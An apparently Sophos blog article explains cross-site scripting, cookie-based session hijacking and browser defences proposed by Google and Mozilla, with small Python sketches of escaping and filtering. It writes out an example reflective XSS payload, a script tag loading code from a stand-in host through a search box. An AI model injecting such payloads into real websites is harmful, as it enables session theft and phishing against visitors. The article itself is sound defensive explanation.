The beginning of the end of popup porn, Facebook worms and cross-site phishing?

Visit just about any page on any website – including most of sophos.com – and your browser will suck in content from other sites, too. This third-party content is often sourced using script code, such as JavaScript, in the primary web page. A script which reaches out from one web site to another is called a cross-site script, or XSS.

Importantly, scripts in a web page can trigger page requests which include (encoded either as parameters to the HTTP request or in the HTTP request body) client-side information. This includes the values of any cookies currently set by the website you are visiting.

Cookies are needed because the HTTP protocol itself is stateless. You don’t log in to an HTTP server and then issue a series of commands, as you do when using FTP or SSH. Instead, each request stands alone, which greatly simplifies – at least in theory – the design and implementation of a basic web server.

Cookies, transmitted in the headers of HTTP requests and replies, are the stateful glue by which modern web servers tie together an otherwise-independent set of HTTP requests into a transaction, or a session, or even a series of sessions. Cookies are how Google, for instance, remembers your search settings, even between multiple sessions, or how Sophos knows that you have already logged in to the product download area in this visit.
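To make the "stateful glue" concrete, here is a minimal sketch of one cookie round trip using Python's standard http.cookies module. The cookie name session_id and its value are assumptions made up for illustration. They are not taken from any real site.

```python
from http.cookies import SimpleCookie

# Server side: the reply to a successful login carries a Set-Cookie header.
# "session_id" and "abc123" are hypothetical values for this sketch.
reply = SimpleCookie()
reply["session_id"] = "abc123"
reply["session_id"]["path"] = "/"
set_cookie_header = reply.output()  # one "Set-Cookie: ..." header line

# Browser side (simulated): every later request to the same site sends the
# stored value back in a Cookie header.
request_cookie_header = "session_id=abc123"

# Server side again: parsing that header is what ties this otherwise
# stand-alone request back to the earlier login.
incoming = SimpleCookie()
incoming.load(request_cookie_header)
session_id = incoming["session_id"].value

print(set_cookie_header)
print(session_id)
```

Anyone who learns the value sent in that Cookie header can present it to the server too, which is why session cookies are worth stealing.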

Separately-visited websites can’t access each other’s cookies via scripts (at least if the browser is correctly implemented), but a script sourced from one site as part of a page on another site is implicitly authorised to reach into the data of the site which included it. So, if you can sneak an unauthorised script tag into someone else’s web page, you can grab the value of all cookies set for that website, possibly including current session authentication information. This may even allow you to hijack that session.

Websites which can be compromised through the insertion of malicious script tags are said to have a cross-site scripting (XSS) vulnerability. Carrying out such a compromise is an XSS exploit.

There are two main sorts of XSS exploit. First is the stored or persistent exploit. As the name suggests, unauthorised tags are permanently stored onto the victim’s web server – for example, using a SQL injection hack to infect fields in the server’s databases. Anyone visiting the site, even if they visit it directly, may be exposed to attack. (SophosLabs finds about 25,000 newly-infected web pages per day, so this sort of compromise is very common.)

More pernicious is the non-persistent or reflective exploit. This sort of exploit is usually much more difficult to detect and to remediate because the unauthorised tags never actually exist on the affected web server. This means that you cannot search for them in files or databases. Reflective XSS attacks exploit poor input validation by the server, tricking the server into accepting malicious tags as input and then reflecting them blindly in the response sent back to the browser.

This sort of attack is possible because HTML relies on special characters to denote embedded objects such as scripts. If I write script in my web page, your browser will display script. But if I write <script>, your browser takes this as a signal to run a script. If I want to display the text <script>, then I must carefully encode the less-than and greater-than signs, like this: &lt;script&gt; so that I don’t send you an unexpected script tag.

Now imagine that your website has a search form. If I type in banana, you may generate a web page to tell me the word banana was not found. But if I “search” for <script src=http://dodgy.example/xss.js></script>, you must convert those angle brackets into &lt; and &gt; in your search results page. If you blindly reflect my text, then I can execute a cross-site script against your website simply through a search. This is always incorrect, usually dangerous, and likely to be exploited.
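The search example can be sketched in a few lines of Python. The two page-building functions are hypothetical stand-ins for whatever your server really does. The only library call is html.escape from the standard library, which performs the angle-bracket encoding described above.

```python
import html

def results_page_unsafe(query: str) -> str:
    # Blindly reflects the visitor's text: any tags in it reach the browser intact.
    return f"<p>The word {query} was not found.</p>"

def results_page_safe(query: str) -> str:
    # html.escape turns <, > and & (and, by default, quotes) into
    # character references, so the browser displays the text instead
    # of interpreting it as markup.
    return f"<p>The word {html.escape(query)} was not found.</p>"

attack = "<script src=http://dodgy.example/xss.js></script>"
print(results_page_unsafe(attack))  # contains a live script tag
print(results_page_safe(attack))    # contains &lt;script ...&gt; as harmless text
```

An innocent search for banana produces the same page from both functions. The difference only shows up when the input contains characters which are special to HTML.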

Sadly, cleaning up, or sanitising, externally-submitted text so that it can be rendered safely back to the visitor is not an easy task, so many web servers are vulnerable to XSS exploits. These can be used for numerous malicious purposes, such as Twitter worms, phishing, unauthorised and unwanted popups, and more.

Unsurprisingly, then, both Mozilla and Google are currently working on browser-based mitigation of XSS exploits. Both approaches are interesting.


Google’s idea is that the browser should condemn any web page which contains script tags (or similar) which also appear in the HTTP request for that page. After all, if a web request contains text which happens to be an HTML tag, that tag ought to be sanitised in the reply. So tags which appear in both request and reply probably represent a reflective XSS risk, and possibly represent an actual XSS exploit. Therefore they should be blocked.
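As a rough illustration of the idea, and emphatically not Google's actual implementation, the check might be sketched like this. The function name, the regular expression and the example URLs are all assumptions of mine. A real browser filter would need to cope with many more encodings and tag types than this toy does.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Matches an opening script tag only; real filters must consider far more.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)

def reflected_script_tags(request_url: str, response_body: str) -> List[str]:
    """Return script tags in the reply which also appear in the request."""
    # Undo URL encoding so that %3Cscript%3E in the request compares
    # equal to <script> in the reply.
    decoded_request = unquote_plus(request_url).lower()
    return [
        tag
        for tag in SCRIPT_TAG.findall(response_body)
        if tag.lower() in decoded_request
    ]

request = ("http://site.example/search?q="
           "%3Cscript+src%3Dhttp%3A%2F%2Fdodgy.example%2Fxss.js%3E%3C%2Fscript%3E")
vulnerable_reply = ("<p>The word <script src=http://dodgy.example/xss.js>"
                    "</script> was not found.</p>")
sanitised_reply = ("<p>The word &lt;script src=http://dodgy.example/xss.js&gt;"
                   "&lt;/script&gt; was not found.</p>")

print(reflected_script_tags(request, vulnerable_reply))  # one suspicious tag
print(reflected_script_tags(request, sanitised_reply))   # nothing to block
```

Script tags which the site itself put in the page do not appear in the request, so they are left alone.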

Mozilla’s approach is complementary, defining a set of HTTP headers by which webmasters can specify the maximum behaviour they expect from their pages. Browsers which understand these headers can then automatically block behaviour outside the specified limits. If you use cross-site scripts, but only to specific third-party locations, such as Google Analytics, you can inform the browser so that it can block XSS requests to unexpected sites.
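Here is a sketch of what such a declaration, and a browser's use of it, might look like. It assumes the Content-Security-Policy header and script-src directive into which Mozilla's proposal was later standardised. The header name in use at the time of writing may differ, and the matching logic below is a deliberate simplification of the real rules. The function names and URLs are hypothetical.

```python
from urllib.parse import urlsplit

def build_policy_header(allowed_script_origins):
    # Webmaster side: allow scripts from the site itself ('self') plus an
    # explicit list of third-party origins.
    sources = " ".join(["'self'", *allowed_script_origins])
    return ("Content-Security-Policy", f"script-src {sources}")

def origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"

def browser_would_load(script_url, page_url, header_value):
    # Browser side, much simplified: this sketch understands exactly one
    # directive and compares whole origins only.
    directive, *sources = header_value.split()
    if directive != "script-src":
        return True
    allowed = {origin_of(page_url) if s == "'self'" else s for s in sources}
    return origin_of(script_url) in allowed

name, value = build_policy_header(["https://www.google-analytics.com"])
page = "https://site.example/index.html"

print(f"{name}: {value}")
print(browser_would_load("https://www.google-analytics.com/analytics.js", page, value))
print(browser_would_load("http://dodgy.example/xss.js", page, value))
```

With this policy in place, a script tag pointing at dodgy.example would be refused even if an attacker managed to get it into the page, whether by reflection or by storing it on the server.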

Google’s technique deals only with reflective XSS exploits, but is automatic and does not rely on webmasters adding special HTTP headers. Mozilla’s technique is discretionary, and only works for sites which go the extra mile of accurately marking up their HTTP replies, but it does provide an additional vehicle for well-meaning webmasters to defend against both reflective and stored XSS attacks.

These approaches are unlikely to mean the end of popup porn, Facebook worms, cross-site phishing and the like, but they are to be applauded nevertheless. What is interesting, in the light of my recent article about cloud computing, is that both approaches require programmatic intelligence embedded into the browser itself, even though they protect against cloud-based vulnerabilities.

In other words, endpoint security really is here to stay. The endpoint is dead. Long live the endpoint.